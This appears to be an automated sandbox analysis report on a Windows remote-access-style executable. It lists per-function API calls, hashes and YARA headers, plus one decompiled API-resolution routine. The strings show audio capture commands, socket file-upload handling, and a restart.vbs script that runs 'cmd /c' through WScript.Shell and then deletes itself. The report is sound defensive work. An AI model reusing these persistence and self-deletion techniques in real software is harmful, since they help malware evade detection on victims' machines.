                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 1753768752-1354618412
                                  • Opcode ID: 3c0475a647ad677730f7fda7c37286edd42fe688e11f07ff3ea9707cde87b4d9
                                  • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                  • Opcode Fuzzy Hash: 3c0475a647ad677730f7fda7c37286edd42fe688e11f07ff3ea9707cde87b4d9
                                  • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409908, Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409908() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
				 *0x41bc94 = _t2;
				if(_t2 == 0) {
					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x41bc94 == 0) {
					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x41bc9c = _t22;
				return _t22;
			}





                                  0x00409924
                                  0x0040992c
                                  0x00409933
                                  0x00409944
                                  0x00409944
                                  0x0040995f
                                  0x00409964
                                  0x00409975
                                  0x00409975
                                  0x00409993
                                  0x004099a7
                                  0x004099bb
                                  0x004099cf
                                  0x004099e3
                                  0x004099f7
                                  0x00409a0b
                                  0x00409a1c
                                  0x00409a24
                                  0x00409a28
                                  0x00409a2e

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                  • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                  • API String ID: 551388010-2914448473
                                  • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                  • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403473, Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                  • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                  • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                  • API String ID: 2510920776-3166941866
                                  • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                  • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004135DE, Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                  • _wgetenv.MSVCRT ref: 0041366D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                  • _wgetenv.MSVCRT ref: 004136CE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                  • _wgetenv.MSVCRT ref: 00413720
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                  • GetLongPathNameW.KERNEL32 ref: 00413748
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                  • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 1999370131-1609423294
                                  • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                  • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004089A6, Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                    • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                  • _wgetenv.MSVCRT ref: 00408A1B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                  • exit.MSVCRT ref: 00408B3D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                  • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                  • API String ID: 864010295-1332127163
                                  • Opcode ID: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                  • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                  • Opcode Fuzzy Hash: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                  • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004055E7, Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 00405607
                                    • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                    • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                    • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                    • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                    • Part of subcall function 00405532: CloseHandle.KERNEL32(00000000), ref: 004055AE
                                    • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
